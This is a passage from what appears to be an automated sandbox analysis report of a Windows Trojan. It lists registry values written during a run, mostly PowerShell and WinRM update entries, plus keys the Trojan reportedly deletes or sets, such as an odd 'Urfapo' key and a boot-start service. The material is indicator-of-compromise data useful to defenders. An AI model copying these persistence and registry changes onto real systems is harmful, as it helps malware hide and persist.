[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathInetsrv" = "%System%\inetsrv"
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "9/20/2015"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3B 67 3B 3C 5E 59 5A 15 F5 E8 BC 9F 0F 5C 2A"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"UpgradeType" = "0"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150920"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]

The process net.exe:2156 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E A5 0E 3D 34 D2 AA CA 2F CD E0 2C EF A3 9D 6D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C BC EA EA C3 14 51 D4 AC EB 1E 69 95 B3 CE D3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 5B 3B BE 03 57 23 FF 69 EB F3 BB EE 66 1F AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process hostname.exe:1384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 52 A1 8D 57 C9 75 E6 5A AC D0 4F 66 72 46 D0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process PSCustomSetupUtil.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 54 75 06 9D 4B F8 1F FE FB 0D 45 C8 74 36 7F"

